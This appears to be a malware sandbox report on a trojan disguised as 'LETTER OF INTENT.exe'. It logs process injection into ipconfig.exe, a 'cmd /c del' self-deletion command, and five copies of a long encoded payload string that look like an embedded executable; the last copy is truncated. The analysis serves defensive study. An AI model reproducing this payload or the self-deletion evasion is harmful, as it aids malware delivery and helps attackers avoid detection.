            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\LETTER OF INTENT.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
            Source: unknownProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess created: C:\Users\user\Desktop\LETTER OF INTENT.exe C:\Users\user\Desktop\LETTER OF INTENT.exeJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\LETTER OF INTENT.exe"Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LETTER OF INTENT.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/2@0/1
            Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: LETTER OF INTENT.exe, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csBase64 encoded string: 'JVNJAAADAAAAABAAAAAP77YAAC4AAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAOD65A4AFUBHGSDOABJTGSCVDINFZSA4DSN5TXEYLNEBRWC3TON52CAYTFEBZHK3RANFXCARCPKMQG233EMUXA2DIKEQAAAAAAAAAAAUCFAAAEYAIDAB5OWDDCAAAAAAAAAAAABYAAAIQQWAJQAAAHUAAAAADAAAAAAAAAAWUZAAAAAIAAAAAKAAAAAAAAAEAAEAAAAAACAAAAIAAAAAAAAAAAAQAAAAAAAAAAAAHAAAAAAAQAAAAAAAAAAMAEBBIAAAIAAAAQAAAAAAAQAAABAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAEJSAAAJ4AAAAAAUAAABKADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAABAQAAACIAAAAAAAAAAAAAAAAAAXHIZLYOQAAAADAPEAAAABAAAAAA6QAAAAAEAAAAAAAAAAAAAAAAAAAAAACAAAAMAXHE43SMMAAAAFIAMAAAAFAAAAAABAAAAAHYAAAAAAAAAAAAAAAAAAAAAAEAAAAIAXHEZLMN5RQAAAMAAAAAAGAAAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAEAAAAIIAAAAAAAAAAAAAAAAAAAAAAAAADZGIAAAAAAAAAJAAAAAACAACQB5CHAAABIUIAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEUARICMAAACQAAABQIBJIAUAAABQAFIABGMABAADQAAAAAEAAAEIACQFCWAAGFJDAAAQWTIBBPGQCDCNCQBIAAADAAKQAAAABGMAFACLQAAAAAIAAAEIACYFAE3YUAAAAUCYHA5NBUWQMBCGS2AAAAEGRMEYGFNDAAFQTA4VS4AACCEDBCB3PCUAAACQTBAJAQKAWAAAAUKAXAAAAUFQJAYNCQGAAAAFAABQ2LAFAAEIHC5MBGBYRA4D74BATBEIQSLOHAAIQMF2YCMDBCBQH7YCBGCQRBIW26CIWFAMQAAAKCMCBCBENFUAAAAITAUERUEIFCYIQLDTJFAMAAAAKAAIQKEYLFMABCCZKAAJTAAYANEAAAAADAAABCADTDIAAACQKAYQIG7AAAAQMBJYAABXRWAAABIUBYAAABIAAEKAJAAAAMBBIBIAAABQLA4UAIAAAAYBSQCIAAADCQCAAAADAYCBIA4AAABQNBFXR2AAABIPRJGQTAQIQI3Y6AAAAUG42CMCRCBJIAYAAABQACYUB6AAABIACULQAAIKBI3ZAAAAAUJRKAAAAAEZQAIABCAAAAACAAAARAAUCCAAABIBG6IQAAAFAUKYAAYVAAAAACMYAGAEHAAAAABIAAAIQAKBDAAAAUA3PEQAAACQKAIBI42IXLGIR64DBBMBI42IXLCGS2AAAAEGBMDIWCMCCWNQAAIIQJEIHMEDATELBCMCQQEIECEC5FHAJANXSKAAABIMFQGKZ7YARGBQRAYWAIFQNFMCASF2YBUABCBAXLAJQIEIEAKHGSF2Z7YBBN7QBCMDRCBZNXAJAEAUONELVSKABAAACWAAICMECWAARBAVAAEZQAQAG6AAAAADAAAARABZACAAAOAFAAATPEUAAACQY3IFRMDBLIUAAMAQIEMAAAAAAAAABAQBIE4AAACVXN4UAAAAKEMAAAAAAAAAHAQBIE4AAACVXFAUQAAAKQQUCUAAABIGREAZIFMAAACRIFQAAACQKAAEBRVQMBAD74AQW7YARGBARAQW24BQTAUVQAEIFFIABGMACAAUAAAAAA4AAAEIAANZAGAAAOAUCYAAABIUC2AAABJZS4AAABIFAMATPF4AAACTUCAAAAAILFMAAOKS6AIUBGAAABIAAAAQDPUAQAAAEAICH2AQAAACCUEZQAMAI2AAAAAEAAAARAANAH7QBBIDCYDAAOIXQAADQOMYAAAAKPIBRN7QBBMDSYFYAAJ5QCAAAAQBHWAQAAACBOWLTBMAAABQMFNLROA76AEGQSLAXAABHWAIAAACAE6YCAAAAIF2YOMFQAAAGBQVTQGID7YARGBARAQWBOAACPMAQAAAEC5MQE6YCAAAAI4YLAAAAMDBLC4AAE6YBAAAAIF2YAJ5QEAAAARZQWAAAAYGCWAAIFIAAAAATGABQA2QAAAAASAAACEAAICQGFQYQAA33AEAAABADPMBAAAAELEBHWAQAAACFQA33AEAAABADPMBAAAAELABHWAIAAACFS4YLAAAAMCZLGEAAG6YBAAAAIA33AIAAABCYAJ5QEAAAARMQG6YCAAAAIA33AEAAABCZAJ5QCAAAARMHGCYAAADAWKYAA4VAAAATGACAANAAAAAAUAAACEAAE6YBAAAAICQCPMBAAAAEBMBXWAIAAACAYA33AIAAABANAYEFSBQILFNAOCKZA4EVSWSYNQJQIKYACECCUEZQAMAK6AAAAAFQAAARAABHWAIAAACAG6YBAAAAJ7QBC37ACCQGFQ3AAAT3AEAAABADPMAQAAAEC5M74AILA4WAKAAZBQVX2AT3AEAAABAXLABXWAIAAACP4AINBEWAKAAYBQVWIABLJ4BHWAQAAACAG6YCAAAAJ7QBC37ACEYECECCYOAAAJ5QEAAAAQBXWAQAAACBOWH6AEJQKEIFFQCQAFQMFMXAE6YCAAAAIF2YAN5QEAAAAT7ACEYGCEDCYBIAC4GCWEYAOKHQAADQAMBCQMIAAAFHGMAAAAFHUCBKAAJTAAQAHEAAAAAMAAABCAADOUBQAAA
            Source: 0.0.LETTER OF INTENT.exe.fd0000.0.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csBase64 encoded string: 'JVNJAAADAAAAABAAAAAP77YAAC4AAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAOD65A4AFUBHGSDOABJTGSCVDINFZSA4DSN5TXEYLNEBRWC3TON52CAYTFEBZHK3RANFXCARCPKMQG233EMUXA2DIKEQAAAAAAAAAAAUCFAAAEYAIDAB5OWDDCAAAAAAAAAAAABYAAAIQQWAJQAAAHUAAAAADAAAAAAAAAAWUZAAAAAIAAAAAKAAAAAAAAAEAAEAAAAAACAAAAIAAAAAAAAAAAAQAAAAAAAAAAAAHAAAAAAAQAAAAAAAAAAMAEBBIAAAIAAAAQAAAAAAAQAAABAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAEJSAAAJ4AAAAAAUAAABKADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAABAQAAACIAAAAAAAAAAAAAAAAAAXHIZLYOQAAAADAPEAAAABAAAAAA6QAAAAAEAAAAAAAAAAAAAAAAAAAAAACAAAAMAXHE43SMMAAAAFIAMAAAAFAAAAAABAAAAAHYAAAAAAAAAAAAAAAAAAAAAAEAAAAIAXHEZLMN5RQAAAMAAAAAAGAAAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAEAAAAIIAAAAAAAAAAAAAAAAAAAAAAAAADZGIAAAAAAAAAJAAAAAACAACQB5CHAAABIUIAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEUARICMAAACQAAABQIBJIAUAAABQAFIABGMABAADQAAAAAEAAAEIACQFCWAAGFJDAAAQWTIBBPGQCDCNCQBIAAADAAKQAAAABGMAFACLQAAAAAIAAAEIACYFAE3YUAAAAUCYHA5NBUWQMBCGS2AAAAEGRMEYGFNDAAFQTA4VS4AACCEDBCB3PCUAAACQTBAJAQKAWAAAAUKAXAAAAUFQJAYNCQGAAAAFAABQ2LAFAAEIHC5MBGBYRA4D74BATBEIQSLOHAAIQMF2YCMDBCBQH7YCBGCQRBIW26CIWFAMQAAAKCMCBCBENFUAAAAITAUERUEIFCYIQLDTJFAMAAAAKAAIQKEYLFMABCCZKAAJTAAYANEAAAAADAAABCADTDIAAACQKAYQIG7AAAAQMBJYAABXRWAAABIUBYAAABIAAEKAJAAAAMBBIBIAAABQLA4UAIAAAAYBSQCIAAADCQCAAAADAYCBIA4AAABQNBFXR2AAABIPRJGQTAQIQI3Y6AAAAUG42CMCRCBJIAYAAABQACYUB6AAABIACULQAAIKBI3ZAAAAAUJRKAAAAAEZQAIABCAAAAACAAAARAAUCCAAABIBG6IQAAAFAUKYAAYVAAAAACMYAGAEHAAAAABIAAAIQAKBDAAAAUA3PEQAAACQKAIBI42IXLGIR64DBBMBI42IXLCGS2AAAAEGBMDIWCMCCWNQAAIIQJEIHMEDATELBCMCQQEIECEC5FHAJANXSKAAABIMFQGKZ7YARGBQRAYWAIFQNFMCASF2YBUABCBAXLAJQIEIEAKHGSF2Z7YBBN7QBCMDRCBZNXAJAEAUONELVSKABAAACWAAICMECWAARBAVAAEZQAQAG6AAAAADAAAARABZACAAAOAFAAATPEUAAACQY3IFRMDBLIUAAMAQIEMAAAAAAAAABAQBIE4AAACVXN4UAAAAKEMAAAAAAAAAHAQBIE4AAACVXFAUQAAAKQQUCUAAABIGREAZIFMAAACRIFQAAACQKAAEBRVQMBAD74AQW7YARGBARAQW24BQTAUVQAEIFFIABGMACAAUAAAAAA4AAAEIAANZAGAAAOAUCYAAABIUC2AAABJZS4AAABIFAMATPF4AAACTUCAAAAAILFMAAOKS6AIUBGAAABIAAAAQDPUAQAAAEAICH2AQAAACCUEZQAMAI2AAAAAEAAAARAANAH7QBBIDCYDAAOIXQAADQOMYAAAAKPIBRN7QBBMDSYFYAAJ5QCAAAAQBHWAQAAACBOWLTBMAAABQMFNLROA76AEGQSLAXAABHWAIAAACAE6YCAAAAIF2YOMFQAAAGBQVTQGID7YARGBARAQWBOAACPMAQAAAEC5MQE6YCAAAAI4YLAAAAMDBLC4AAE6YBAAAAIF2YAJ5QEAAAARZQWAAAAYGCWAAIFIAAAAATGABQA2QAAAAASAAACEAAICQGFQYQAA33AEAAABADPMBAAAAELEBHWAQAAACFQA33AEAAABADPMBAAAAELABHWAIAAACFS4YLAAAAMCZLGEAAG6YBAAAAIA33AIAAABCYAJ5QEAAAARMQG6YCAAAAIA33AEAAABCZAJ5QCAAAARMHGCYAAADAWKYAA4VAAAATGACAANAAAAAAUAAACEAAE6YBAAAAICQCPMBAAAAEBMBXWAIAAACAYA33AIAAABANAYEFSBQILFNAOCKZA4EVSWSYNQJQIKYACECCUEZQAMAK6AAAAAFQAAARAABHWAIAAACAG6YBAAAAJ7QBC37ACCQGFQ3AAAT3AEAAABADPMAQAAAEC5M74AILA4WAKAAZBQVX2AT3AEAAABAXLABXWAIAAACP4AINBEWAKAAYBQVWIABLJ4BHWAQAAACAG6YCAAAAJ7QBC37ACEYECECCYOAAAJ5QEAAAAQBXWAQAAACBOWH6AEJQKEIFFQCQAFQMFMXAE6YCAAAAIF2YAN5QEAAAAT7ACEYGCEDCYBIAC4GCWEYAOKHQAADQAMBCQMIAAAFHGMAAAAFHUCBKAAJTAAQAHEAAAAAMAAABCAADOUBQAAA
            Source: 1.0.LETTER OF INTENT.exe.670000.9.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csBase64 encoded string: 'JVNJAAADAAAAABAAAAAP77YAAC4AAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAOD65A4AFUBHGSDOABJTGSCVDINFZSA4DSN5TXEYLNEBRWC3TON52CAYTFEBZHK3RANFXCARCPKMQG233EMUXA2DIKEQAAAAAAAAAAAUCFAAAEYAIDAB5OWDDCAAAAAAAAAAAABYAAAIQQWAJQAAAHUAAAAADAAAAAAAAAAWUZAAAAAIAAAAAKAAAAAAAAAEAAEAAAAAACAAAAIAAAAAAAAAAAAQAAAAAAAAAAAAHAAAAAAAQAAAAAAAAAAMAEBBIAAAIAAAAQAAAAAAAQAAABAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAEJSAAAJ4AAAAAAUAAABKADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAABAQAAACIAAAAAAAAAAAAAAAAAAXHIZLYOQAAAADAPEAAAABAAAAAA6QAAAAAEAAAAAAAAAAAAAAAAAAAAAACAAAAMAXHE43SMMAAAAFIAMAAAAFAAAAAABAAAAAHYAAAAAAAAAAAAAAAAAAAAAAEAAAAIAXHEZLMN5RQAAAMAAAAAAGAAAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAEAAAAIIAAAAAAAAAAAAAAAAAAAAAAAAADZGIAAAAAAAAAJAAAAAACAACQB5CHAAABIUIAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEUARICMAAACQAAABQIBJIAUAAABQAFIABGMABAADQAAAAAEAAAEIACQFCWAAGFJDAAAQWTIBBPGQCDCNCQBIAAADAAKQAAAABGMAFACLQAAAAAIAAAEIACYFAE3YUAAAAUCYHA5NBUWQMBCGS2AAAAEGRMEYGFNDAAFQTA4VS4AACCEDBCB3PCUAAACQTBAJAQKAWAAAAUKAXAAAAUFQJAYNCQGAAAAFAABQ2LAFAAEIHC5MBGBYRA4D74BATBEIQSLOHAAIQMF2YCMDBCBQH7YCBGCQRBIW26CIWFAMQAAAKCMCBCBENFUAAAAITAUERUEIFCYIQLDTJFAMAAAAKAAIQKEYLFMABCCZKAAJTAAYANEAAAAADAAABCADTDIAAACQKAYQIG7AAAAQMBJYAABXRWAAABIUBYAAABIAAEKAJAAAAMBBIBIAAABQLA4UAIAAAAYBSQCIAAADCQCAAAADAYCBIA4AAABQNBFXR2AAABIPRJGQTAQIQI3Y6AAAAUG42CMCRCBJIAYAAABQACYUB6AAABIACULQAAIKBI3ZAAAAAUJRKAAAAAEZQAIABCAAAAACAAAARAAUCCAAABIBG6IQAAAFAUKYAAYVAAAAACMYAGAEHAAAAABIAAAIQAKBDAAAAUA3PEQAAACQKAIBI42IXLGIR64DBBMBI42IXLCGS2AAAAEGBMDIWCMCCWNQAAIIQJEIHMEDATELBCMCQQEIECEC5FHAJANXSKAAABIMFQGKZ7YARGBQRAYWAIFQNFMCASF2YBUABCBAXLAJQIEIEAKHGSF2Z7YBBN7QBCMDRCBZNXAJAEAUONELVSKABAAACWAAICMECWAARBAVAAEZQAQAG6AAAAADAAAARABZACAAAOAFAAATPEUAAACQY3IFRMDBLIUAAMAQIEMAAAAAAAAABAQBIE4AAACVXN4UAAAAKEMAAAAAAAAAHAQBIE4AAACVXFAUQAAAKQQUCUAAABIGREAZIFMAAACRIFQAAACQKAAEBRVQMBAD74AQW7YARGBARAQW24BQTAUVQAEIFFIABGMACAAUAAAAAA4AAAEIAANZAGAAAOAUCYAAABIUC2AAABJZS4AAABIFAMATPF4AAACTUCAAAAAILFMAAOKS6AIUBGAAABIAAAAQDPUAQAAAEAICH2AQAAACCUEZQAMAI2AAAAAEAAAARAANAH7QBBIDCYDAAOIXQAADQOMYAAAAKPIBRN7QBBMDSYFYAAJ5QCAAAAQBHWAQAAACBOWLTBMAAABQMFNLROA76AEGQSLAXAABHWAIAAACAE6YCAAAAIF2YOMFQAAAGBQVTQGID7YARGBARAQWBOAACPMAQAAAEC5MQE6YCAAAAI4YLAAAAMDBLC4AAE6YBAAAAIF2YAJ5QEAAAARZQWAAAAYGCWAAIFIAAAAATGABQA2QAAAAASAAACEAAICQGFQYQAA33AEAAABADPMBAAAAELEBHWAQAAACFQA33AEAAABADPMBAAAAELABHWAIAAACFS4YLAAAAMCZLGEAAG6YBAAAAIA33AIAAABCYAJ5QEAAAARMQG6YCAAAAIA33AEAAABCZAJ5QCAAAARMHGCYAAADAWKYAA4VAAAATGACAANAAAAAAUAAACEAAE6YBAAAAICQCPMBAAAAEBMBXWAIAAACAYA33AIAAABANAYEFSBQILFNAOCKZA4EVSWSYNQJQIKYACECCUEZQAMAK6AAAAAFQAAARAABHWAIAAACAG6YBAAAAJ7QBC37ACCQGFQ3AAAT3AEAAABADPMAQAAAEC5M74AILA4WAKAAZBQVX2AT3AEAAABAXLABXWAIAAACP4AINBEWAKAAYBQVWIABLJ4BHWAQAAACAG6YCAAAAJ7QBC37ACEYECECCYOAAAJ5QEAAAAQBXWAQAAACBOWH6AEJQKEIFFQCQAFQMFMXAE6YCAAAAIF2YAN5QEAAAAT7ACEYGCEDCYBIAC4GCWEYAOKHQAADQAMBCQMIAAAFHGMAAAAFHUCBKAAJTAAQAHEAAAAAMAAABCAADOUBQAAA
            Source: 1.0.LETTER OF INTENT.exe.670000.1.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csBase64 encoded string: 'JVNJAAADAAAAABAAAAAP77YAAC4AAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAOD65A4AFUBHGSDOABJTGSCVDINFZSA4DSN5TXEYLNEBRWC3TON52CAYTFEBZHK3RANFXCARCPKMQG233EMUXA2DIKEQAAAAAAAAAAAUCFAAAEYAIDAB5OWDDCAAAAAAAAAAAABYAAAIQQWAJQAAAHUAAAAADAAAAAAAAAAWUZAAAAAIAAAAAKAAAAAAAAAEAAEAAAAAACAAAAIAAAAAAAAAAAAQAAAAAAAAAAAAHAAAAAAAQAAAAAAAAAAMAEBBIAAAIAAAAQAAAAAAAQAAABAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAEJSAAAJ4AAAAAAUAAABKADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAABAQAAACIAAAAAAAAAAAAAAAAAAXHIZLYOQAAAADAPEAAAABAAAAAA6QAAAAAEAAAAAAAAAAAAAAAAAAAAAACAAAAMAXHE43SMMAAAAFIAMAAAAFAAAAAABAAAAAHYAAAAAAAAAAAAAAAAAAAAAAEAAAAIAXHEZLMN5RQAAAMAAAAAAGAAAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAEAAAAIIAAAAAAAAAAAAAAAAAAAAAAAAADZGIAAAAAAAAAJAAAAAACAACQB5CHAAABIUIAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEUARICMAAACQAAABQIBJIAUAAABQAFIABGMABAADQAAAAAEAAAEIACQFCWAAGFJDAAAQWTIBBPGQCDCNCQBIAAADAAKQAAAABGMAFACLQAAAAAIAAAEIACYFAE3YUAAAAUCYHA5NBUWQMBCGS2AAAAEGRMEYGFNDAAFQTA4VS4AACCEDBCB3PCUAAACQTBAJAQKAWAAAAUKAXAAAAUFQJAYNCQGAAAAFAABQ2LAFAAEIHC5MBGBYRA4D74BATBEIQSLOHAAIQMF2YCMDBCBQH7YCBGCQRBIW26CIWFAMQAAAKCMCBCBENFUAAAAITAUERUEIFCYIQLDTJFAMAAAAKAAIQKEYLFMABCCZKAAJTAAYANEAAAAADAAABCADTDIAAACQKAYQIG7AAAAQMBJYAABXRWAAABIUBYAAABIAAEKAJAAAAMBBIBIAAABQLA4UAIAAAAYBSQCIAAADCQCAAAADAYCBIA4AAABQNBFXR2AAABIPRJGQTAQIQI3Y6AAAAUG42CMCRCBJIAYAAABQACYUB6AAABIACULQAAIKBI3ZAAAAAUJRKAAAAAEZQAIABCAAAAACAAAARAAUCCAAABIBG6IQAAAFAUKYAAYVAAAAACMYAGAEHAAAAABIAAAIQAKBDAAAAUA3PEQAAACQKAIBI42IXLGIR64DBBMBI42IXLCGS2AAAAEGBMDIWCMCCWNQAAIIQJEIHMEDATELBCMCQQEIECEC5FHAJANXSKAAABIMFQGKZ7YARGBQRAYWAIFQNFMCASF2YBUABCBAXLAJQIEIEAKHGSF2Z7YBBN7QBCMDRCBZNXAJAEAUONELVSKABAAACWAAICMECWAARBAVAAEZQAQAG6AAAAADAAAARABZACAAAOAFAAATPEUAAACQY3IFRMDBLIUAAMAQIEMAAAAAAAAABAQBIE4AAACVXN4UAAAAKEMAAAAAAAAAHAQBIE4AAACVXFAUQAAAKQQUCUAAABIGREAZIFMAAACRIFQAAACQKAAEBRVQMBAD74AQW7YARGBARAQW24BQTAUVQAEIFFIABGMACAAUAAAAAA4AAAEIAANZAGAAAOAUCYAAABIUC2AAABJZS4AAABIFAMATPF4AAACTUCAAAAAILFMAAOKS6AIUBGAAABIAAAAQDPUAQAAAEAICH2AQAAACCUEZQAMAI2AAAAAEAAAARAANAH7QBBIDCYDAAOIXQAADQOMYAAAAKPIBRN7QBBMDSYFYAAJ5QCAAAAQBHWAQAAACBOWLTBMAAABQMFNLROA76AEGQSLAXAABHWAIAAACAE6YCAAAAIF2YOMFQAAAGBQVTQGID7YARGBARAQWBOAACPMAQAAAEC5MQE6YCAAAAI4YLAAAAMDBLC4AAE6YBAAAAIF2YAJ5QEAAAARZQWAAAAYGCWAAIFIAAAAATGABQA2QAAAAASAAACEAAICQGFQYQAA33AEAAABADPMBAAAAELEBHWAQAAACFQA33AEAAABADPMBAAAAELABHWAIAAACFS4YLAAAAMCZLGEAAG6YBAAAAIA33AIAAABCYAJ5QEAAAARMQG6YCAAAAIA33AEAAABCZAJ5QCAAAARMHGCYAAADAWKYAA4VAAAATGACAANAAAAAAUAAACEAAE6YBAAAAICQCPMBAAAAEBMBXWAIAAACAYA33AIAAABANAYEFSBQILFNAOCKZA4EVSWSYNQJQIKYACECCUEZQAMAK6AAAAAFQAAARAABHWAIAAACAG6YBAAAAJ7QBC37ACCQGFQ3AAAT3AEAAABADPMAQAAAEC5M74AILA4WAKAAZBQVX2AT3AEAAABAXLABXWAIAAACP4AINBEWAKAAYBQVWIABLJ4BHWAQAAACAG6YCAAAAJ7QBC37ACEYECECCYOAAAJ5QEAAAAQBXWAQAAACBOWH6AEJQKEIFFQCQAFQMFMXAE6YCAAAAIF2YAN5QEAAAAT7ACEYGCEDCYBIAC4GCWEYAOKHQAADQAMBCQMIAAAFHGMAAAAFHUCBKAAJTAAQAHEAAAAAMAAABCAADOUBQAAA
            Source: 1.0.LETTER OF INTENT.exe.670000.0.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csBase64 encoded string: 'JVNJAAADAAAAABAAAAAP77YAAC4AAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAOD65A4AFUBHGSDOABJTGSCVDINFZSA4DSN5TXEYLNEBRWC3TON52CAYTFEBZHK3RANFXCARCPKMQG233EMUXA2DIKEQAAAAAAAAAAAUCFAAAEYAIDAB5OWDDCAAAAAAAAAAAABYAAAIQQWAJQAAAHUAAAAADAAAAAAAAAAWUZAAAAAIAAAAAKAAAAAAAAAEAAEAAAAAACAAAAIAAAAAAAAAAAAQAAAAAAAAAAAAHAAAAAAAQAAAAAAAAAAMAEBBIAAAIAAAAQAAAAAAAQAAABAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAEJSAAAJ4AAAAAAUAAABKADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAABAQAAACIAAAAAAAAAAAAAAAAAAXHIZLYOQAAAADAPEAAAABAAAAAA6QAAAAAEAAAAAAAAAAAAAAAAAAAAAACAAAAMAXHE43SMMAAAAFIAMAAAAFAAAAAABAAAAAHYAAAAAAAAAAAAAAAAAAAAAAEAAAAIAXHEZLMN5RQAAAMAAAAAAGAAAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAEAAAAIIAAAAAAAAAAAAAAAAAAAAAAAAADZGIAAAAAAAAAJAAAAAACAACQB5CHAAABIUIAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEUARICMAAACQAAABQIBJIAUAAABQAFIABGMABAADQAAAAAEAAAEIACQFCWAAGFJDAAAQWTIBBPGQCDCNCQBIAAADAAKQAAAABGMAFACLQAAAAAIAAAEIACYFAE3YUAAAAUCYHA5NBUWQMBCGS2AAAAEGRMEYGFNDAAFQTA4VS4AACCEDBCB3PCUAAACQTBAJAQKAWAAAAUKAXAAAAUFQJAYNCQGAAAAFAABQ2LAFAAEIHC5MBGBYRA4D74BATBEIQSLOHAAIQMF2YCMDBCBQH7YCBGCQRBIW26CIWFAMQAAAKCMCBCBENFUAAAAITAUERUEIFCYIQLDTJFAMAAAAKAAIQKEYLFMABCCZKAAJTAAYANEAAAAADAAABCADTDIAAACQKAYQIG7AAAAQMBJYAABXRWAAABIUBYAAABIAAEKAJAAAAMBBIBIAAABQLA4UAIAAAAYBSQCIAAADCQCAAAADAYCBIA4AAABQNBFXR2AAABIPRJGQTAQIQI3Y6AAAAUG42CMCRCBJIAYAAABQACYUB6AAABIACULQAAIKBI3ZAAAAAUJRKAAAAAEZQAIABCAAAAACAAAARAAUCCAAABIBG6IQAAAFAUKYAAYVAAAAACMYAGAEHAAAAABIAAAIQAKBDAAAAUA3PEQAAACQKAIBI42IXLGIR64DBBMBI42IXLCGS2AAAAEGBMDIWCMCCWNQAAIIQJEIHMEDATELBCMCQQEIECEC5FHAJANXSKAAABIMFQGKZ7YARGBQRAYWAIFQNFMCASF2YBUABCBAXLAJQIEIEAKHGSF2Z7YBBN7QBCMDRCBZNXAJAEAUONELVSKABAAACWAAICMECWAARBAVAAEZQAQAG6AAAAADAAAARABZACAAAOAFAAATPEUAAACQY3IFRMDBLIUAAMAQIEMAAAAAAAAABAQBIE4AAACVXN4UAAAAKEMAAAAAAAAAHAQBIE4AAACVXFAUQAAAKQQUCUAAABIGREAZIFMAAACRIFQAAACQKAAEBRVQMBAD74AQW7YARGBARAQW24BQTAUVQAEIFFIABGMACAAUAAAAAA4AAAEIAANZAGAAAOAUCYAAABIUC2AAABJZS4AAABIFAMATPF4AAACTUCAAAAAILFMAAOKS6AIUBGAAABIAAAAQDPUAQAAAEAICH2AQAAACCUEZQAMAI2AAAAAEAAAARAANAH7QBBIDCYDAAOIXQAADQOMYAAAAKPIBRN7QBBMDSYFYAAJ5QCAAAAQBHWAQAAACBOWLTBMAAABQMFNLROA76AEGQSLAXAABHWAIAAACAE6YCAAAAIF2YOMFQAAAGBQVTQGID7YARGBARAQWBOAACPMAQAAAEC5MQE6YCAAAAI4YLAAAAMDBLC4AAE6YBAAAAIF2YAJ5QEAAAARZQWAAAAYGCWAAIFIAAAAATGABQA2QAAAAASAAACEAAICQGFQYQAA33AEAAABADPMBAAAAELEBHWAQAAACFQA33AEAAABADPMBAAAAELABHWAIAAACFS4YLAAAAMCZLGEAAG6YBAAAAIA33AIAAABCYAJ5QEAAAARMQG6YCAAAAIA33AEAAABCZAJ5QCAAAARMHGCYAAADAWKYAA4VA